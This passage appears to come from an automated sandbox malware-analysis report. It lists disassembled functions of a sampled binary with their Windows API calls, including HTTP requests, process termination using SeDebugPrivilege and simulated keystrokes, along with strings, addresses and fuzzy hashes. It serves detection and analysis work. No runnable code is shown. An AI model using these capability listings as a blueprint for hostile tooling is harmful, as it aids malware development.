Instruction Fuzzy Hash: 4F71F431900114EFCF21EF64CC84AAE7BB1FF49310F144A6BED555A2A6C7398C41EB69

Function 00464C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00464C5E
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00464C8A
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00464CCC
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00464CE1
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00464CEE
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00464D1E
InternetCloseHandle.WININET(00000000), ref: 00464D65

Part of subcall function 004656A9: GetLastError.KERNEL32(?,?,00464A2B,00000000,00000000,00000001), ref: 004656BE

Strings

, xrefs: 00464D17

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 29d268b42c8c4d5299c9a0950474ac7db2597f8df1c4bec47103be08dd85ecf5
Instruction ID: bfd1ff2e5fb53e8fcc9e2fa031f75664a05dd78b8626c728ec8bf42766c4a865
Opcode Fuzzy Hash: 29d268b42c8c4d5299c9a0950474ac7db2597f8df1c4bec47103be08dd85ecf5
Instruction Fuzzy Hash: 634191B1901608BFEB119F90CD85FFB77ACEF48314F10416BFA019A251E7789D448BAA

Function 0046BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,004ADBF0), ref: 0046BBA1
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,004ADBF0), ref: 0046BBD5
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0046BD33
SysFreeString.OLEAUT32(?), ref: 0046BD5D
StringFromGUID2.COMBASE(?,?,00000028), ref: 0046BEAD
ProgIDFromCLSID.COMBASE(?,?), ref: 0046BEF7
CoTaskMemFree.COMBASE(?), ref: 0046BF14

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
String ID:
API String ID: 793797124-0
Opcode ID: 6f29b261b7322dc0f37c07e567333bd460d8511968985be8ffd7c8dcc7c36c8d
Instruction ID: b52ffb2b24894b7302235fcd01f1785f52a77b4e4365bf4ef33e90c6961d544b
Opcode Fuzzy Hash: 6f29b261b7322dc0f37c07e567333bd460d8511968985be8ffd7c8dcc7c36c8d
Instruction Fuzzy Hash: 45F12E71900109EFCB14DFA4C884EAEB7B9FF89315F10845AF905EB251EB35AE81CB95

Function 0042B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 004149CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00414954,00000000), ref: 00414A23

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0042B85B), ref: 0042B926
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0042B85B,00000000,?,?,0042AF1E,?,?), ref: 0042B9BD
DestroyAcceleratorTable.USER32(00000000), ref: 0048E775
DeleteObject.GDI32(00000000), ref: 0048E7EB

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 67d79f2b0e4adac50f25f9e22f39cd81f1438197e8a18e9eed55af81d5633c60
Instruction ID: 77db14fcb8801f1c18137b30376bd0aa1c619a4a67addc62eb87d169382b57c9
Opcode Fuzzy Hash: 67d79f2b0e4adac50f25f9e22f39cd81f1438197e8a18e9eed55af81d5633c60
Instruction Fuzzy Hash: D4619C30601611EFDB21FF26E888B2AB7F1FB55315F50493BE58686670C778A881DB8D

Function 0047B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0047B204

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: bce66cdd86d61af8d0b8b2be2e403650ed17190776fdc414f6b4c0556bfef2e5
Instruction ID: 01ebb7a0a3b5a615d538b138b338d585f51ac1b79daceedca0c94ac768e1ab6f
Opcode Fuzzy Hash: bce66cdd86d61af8d0b8b2be2e403650ed17190776fdc414f6b4c0556bfef2e5
Instruction Fuzzy Hash: 1B519330600214BFEB249F298C99BDE3B65EB05358F60C127F919D62A1CB79DD90CBD9

Function 0042A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0048E9EA
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048EA0B
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0048EA20
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0048EA3D
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0048EA64
DestroyCursor.USER32(00000000), ref: 0048EA6F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0048EA8C
DestroyCursor.USER32(00000000), ref: 0048EA97

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: eedbd0c838bdcd56e219d19dd5c8968528efd28095d97b886d6906eec0c3fe67
Instruction ID: 805ffdeff873f5b626af8118dcbc61116104d1de4b884ab0fc718a1c75f5a8cd
Opcode Fuzzy Hash: eedbd0c838bdcd56e219d19dd5c8968528efd28095d97b886d6906eec0c3fe67
Instruction Fuzzy Hash: 0351BA70700204EFDB24EF66DC81FAA77B4BB48714F10062AF946972A0D7B8EC91DB59

Function 0042F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0048E9A0,00000004,00000000,00000000), ref: 0042F737
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0048E9A0,00000004,00000000,00000000), ref: 0042F77E
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0048E9A0,00000004,00000000,00000000), ref: 0048EB55
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0048E9A0,00000004,00000000,00000000), ref: 0048EBC1

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 3d80dc07ab2ce5a9306c00da011f6ee962deab75f8ee8ef3f400c2f662578fb5
Instruction ID: b706f1b05dd358e998cd71e9afcad93c73051470a4318cc589ddf95e5ba66d34
Opcode Fuzzy Hash: 3d80dc07ab2ce5a9306c00da011f6ee962deab75f8ee8ef3f400c2f662578fb5
Instruction Fuzzy Hash: 3A412D30704690AADB349739ACC862B7AB56B95305FE4083FF44742661C67CB849D71E

Function 00457E6F Relevance: 13.6, APIs: 9, Instructions: 135filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004131DA

Part of subcall function 00457C0C: GetFileAttributesW.KERNEL32(?,00456A7B), ref: 00457C0D

lstrcmpiW.KERNEL32(?,?), ref: 00457ED2
_wcscmp.LIBCMT ref: 00457EEA
MoveFileW.KERNEL32(?,?), ref: 00457F03

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
String ID:
API String ID: 4093841705-0
Opcode ID: 3442f096bede0159a218ae4dc540ca2b1fe9f2b0ffa7f92bc89056c74a5fb27b
Instruction ID: 5d02f207f08dc5f5a135f59a61731ad33f9bbbc0a3f5aaf2c23126a47458ddcf
Opcode Fuzzy Hash: 3442f096bede0159a218ae4dc540ca2b1fe9f2b0ffa7f92bc89056c74a5fb27b
Instruction Fuzzy Hash: 774138728042196ACF11EBA5EC45ADEB3BCAF08314F5055EBF505A3152DB389B89CF68

Function 0044CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0044E158
Part of subcall function 0044E138: GetCurrentThreadId.KERNEL32 ref: 0044E15F
Part of subcall function 0044E138: AttachThreadInput.USER32(00000000,?,0044CD34,?,00000001), ref: 0044E166

MapVirtualKeyW.USER32(00000025,00000000), ref: 0044CE06
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0044CE23
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0044CE26
MapVirtualKeyW.USER32(00000025,00000000), ref: 0044CE2F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0044CE4D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0044CE50
MapVirtualKeyW.USER32(00000025,00000000), ref: 0044CE59
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0044CE70
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0044CE73

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 11cdd6fb7136ce7df08907efd7e056e8a0b3582ad7bc84818210528ca13afcc0
Instruction ID: 3bba695396b87eae9484c976a5f65b90b53891b1e9d009213d7167109b08aeac
Opcode Fuzzy Hash: 11cdd6fb7136ce7df08907efd7e056e8a0b3582ad7bc84818210528ca13afcc0
Instruction Fuzzy Hash: FA11C8B2950618BEF7106F65CC8EF5E7A2DDB58754F600426F3406B0E0CAF65C419AAC

Function 0046C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 0044A857: CLSIDFromProgID.COMBASE ref: 0044A874
Part of subcall function 0044A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0044A88F
Part of subcall function 0044A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0044A89D
Part of subcall function 0044A857: CoTaskMemFree.COMBASE(00000000), ref: 0044A8AD

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046C6AD
_memset.LIBCMT ref: 0046C6BA
_memset.LIBCMT ref: 0046C7D8
CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0046C804
CoTaskMemFree.COMBASE(?), ref: 0046C80F

Strings

NULL Pointer assignment, xrefs: 0046C85D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 0829511924c60987f1a8b5dac865bb50efcb26a441bb5f2b1dc8a36aca177b2e
Instruction ID: c5e8815c1eee37a05a670e02cb2b210f390c55f7a07d5a2fdd9a595e426cf0a3
Opcode Fuzzy Hash: 0829511924c60987f1a8b5dac865bb50efcb26a441bb5f2b1dc8a36aca177b2e
Instruction Fuzzy Hash: C1917C71D00218AFDB10DFA5DC80EEEBBB8EF08754F20412AF515A7291EB745A45CFA5

Function 00471AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00471B09
Process32FirstW.KERNEL32(00000000,?), ref: 00471B17
__wsplitpath.LIBCMT ref: 00471B45

Part of subcall function 0043297D: __wsplitpath_helper.LIBCMT ref: 004329BD

_wcscat.LIBCMT ref: 00471B5A
Process32NextW.KERNEL32(00000000,?), ref: 00471BD0
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00471BE2

Strings

hEL, xrefs: 00471AED

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID: hEL
API String ID: 1380811348-1273099633
Opcode ID: 4e8823494d94565b9396a1e97e1b2e8f443d25c877e1504c56bc010872e7d3f5
Instruction ID: fba5d834e21ce9639cc4de570b4a965d2841147c90ed78d9752726c3a759f96b
Opcode Fuzzy Hash: 4e8823494d94565b9396a1e97e1b2e8f443d25c877e1504c56bc010872e7d3f5
Instruction Fuzzy Hash: 1B517271504300AFD710DF25D885EABB7E8EF88758F00492FF58997261EB74E944CB9A

Function 00479882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00479926
SendMessageW.USER32(?,00001036,00000000,?), ref: 0047993A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00479954
_wcscat.LIBCMT ref: 004799AF
SendMessageW.USER32(?,00001057,00000000,?), ref: 004799C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 004799F4

Strings

SysListView32, xrefs: 004798F8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 2a2fb62b1dfe2d9ab5a0b4386836ff08c4cdea8e2415cc7e62712a09162ada1e
Instruction ID: dc47ab94370e5f0a98431b85c8d0ad3ffb27d61781f1cb04519918a205fd2ce3
Opcode Fuzzy Hash: 2a2fb62b1dfe2d9ab5a0b4386836ff08c4cdea8e2415cc7e62712a09162ada1e
Instruction Fuzzy Hash: FB41A371A00308ABEB219F64CC85FEF77B8EF08354F11452BF549A7291D6799D84CB68

Function 00471620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00456F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00456F7D
Part of subcall function 00456F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00456F8D
Part of subcall function 00456F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00457022

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047168B
GetLastError.KERNEL32 ref: 0047169E
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004716CA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00471746
GetLastError.KERNEL32(00000000), ref: 00471751
CloseHandle.KERNEL32(00000000), ref: 00471786

Strings

SeDebugPrivilege, xrefs: 004716A9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 44ca94186524958da6209c1ccf78ff30cf3dd2618af0d0ce97fcc6c8ac1e936a
Instruction ID: 90651982e8270fc8ff3ac2fb3b87be3a57dc2357115c45c9de59bfeffab3b3fc
Opcode Fuzzy Hash: 44ca94186524958da6209c1ccf78ff30cf3dd2618af0d0ce97fcc6c8ac1e936a
Instruction Fuzzy Hash: 3341B175A00201AFDB14EF59C8A1FADB7A5AF54309F04805FF90A5F292DB78D844CB59

Function 00456237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004562D6

Strings

warning, xrefs: 004562BF
question, xrefs: 0045628F
stop, xrefs: 004562A7
info, xrefs: 00456277
blank, xrefs: 00456258

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 5cdbd1e8a12325caa28d13d1b3cd426eb1720242d8d4f7c189e216f6242cb820
Instruction ID: f4cdf03b8307ca8666c03e5dc6d382ac318ab0b30930b68a8746b77a7e14d2f3
Opcode Fuzzy Hash: 5cdbd1e8a12325caa28d13d1b3cd426eb1720242d8d4f7c189e216f6242cb820
Instruction Fuzzy Hash: C711D875308342BBD7016A55DC42E6BA39C9F16726F61007FF901A73C3E7AC7A45416D

Function 0045757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00457595
LoadStringW.USER32(00000000), ref: 0045759C
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004575B2
LoadStringW.USER32(00000000), ref: 004575B9
_wprintf.LIBCMT ref: 004575DF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004575FD

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004575DA

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 37fc3d1989052cdd53c58a0c1db9bef6a90b68b20cf97b1cc0f89e9fc7d534cc
Instruction ID: b708ac8b6ba3919a0c36d233a1f7971d7cc0ccf64f48266788af8cdde4797d63
Opcode Fuzzy Hash: 37fc3d1989052cdd53c58a0c1db9bef6a90b68b20cf97b1cc0f89e9fc7d534cc
